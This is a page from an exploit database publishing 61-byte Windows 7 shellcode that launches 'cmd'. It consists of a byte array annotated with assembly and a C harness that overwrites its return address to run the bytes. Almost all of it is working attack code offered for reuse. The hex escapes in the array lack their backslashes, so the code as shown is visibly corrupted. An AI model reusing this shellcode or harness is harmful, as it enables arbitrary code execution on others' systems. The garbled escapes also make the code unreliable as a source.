[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Windows Seven x64 (cmd) Shellcode 61 Bytes
# Published : 2010-06-01
# Author : agix
# Previous Title : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
# Next Title : Windows XP SP3 English MessageBoxA Shellcode - 87 bytes
/*
| Title: Windows Seven x64 (cmd) Shellcode 61 Bytes
| Type: Shellcode
| Author: agix
| Platform: win32
| Info: Tested on Windows Seven Pro Fr, Ultimate En, Premium Home En
*/
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' __ /'__` / __ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ ` / /_/__<_ /'___ / /`'__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ################################## 1
0 I'm agix member from Inj3ct0r Team 1
1 ################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#include <stdio.h>
char shellcode[] =
"x31xC9" //xor ecx,ecx
"x64x8Bx71x30" //mov esi,[fs:ecx+0x30]
"x8Bx76x0C" //mov esi,[esi+0xc]
"x8Bx76x1C" //mov esi,[esi+0x1c]
"x8Bx36" //mov esi,[esi]
"x8Bx06" //mov eax,[esi]
"x8Bx68x08" //mov ebp,[eax+0x8]
"xEBx20" //jmp short 0x35
"x5B" //pop ebx
"x53" //push ebx
"x55" //push ebp
"x5B" //pop ebx
"x81xEBx11x11x11x11" //sub ebx,0x11111111
"x81xC3xDAx3Fx1Ax11" //add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
"xFFxD3" //call ebx
"x81xC3x11x11x11x11" //add ebx,0x11111111
"x81xEBx8CxCCx18x11" //sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
"xFFxD3" //call ebx
"xE8xDBxFFxFFxFF" //call dword 0x15
//db "cmd"
"x63x6dx64";
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}